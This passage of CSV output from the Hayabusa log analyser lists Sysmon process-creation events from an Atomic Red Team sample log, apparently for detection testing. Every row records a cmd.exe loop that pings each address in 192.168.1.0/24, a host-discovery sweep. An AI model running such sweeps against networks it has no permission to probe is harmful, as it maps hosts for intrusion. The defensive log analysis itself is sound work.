192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:21.488 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.94 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:22.030 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.95 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:22.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.96 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:23.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.97 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:23.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.98 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:24.026 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.99 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:24.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.100 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:25.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.101 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:25.529 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.102 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:26.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.103 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:26.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.104 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:27.040 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.105 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:27.493 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.106 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:28.017 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.107 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:28.537 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.108 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:29.110 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.109 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:29.561 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.110 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:30.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.111 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:30.526 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.112 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:31.015 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.113 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:31.476 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.114 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:32.005 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.115 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:32.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.116 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:33.004 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.117 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:33.515 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.118 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:33.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.119 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:34.490 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.120 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:35.031 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.121 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:35.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.122 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:35.999 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.123 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:36.510 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.124 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:36.905 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.125 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:37.449 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.126 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:37.947 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.127 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:38.514 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.128 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:38.992 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.129 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:39.508 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.130 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:40.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.131 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:40.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.132 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:40.960 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.133 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:41.512 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.134 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:41.967 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.135 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:42.436 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.136 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:42.881 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.137 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:43.478 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.138 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:43.951 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.139 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:44.408 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.140 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:44.926 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.141 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:45.532 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.142 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:45.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.143 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:46.405 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.144 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:46.879 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.145 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:47.411 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.146 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:47.993 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.147 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:48.567 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.148 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx -2019-07-19 23:52:49.026 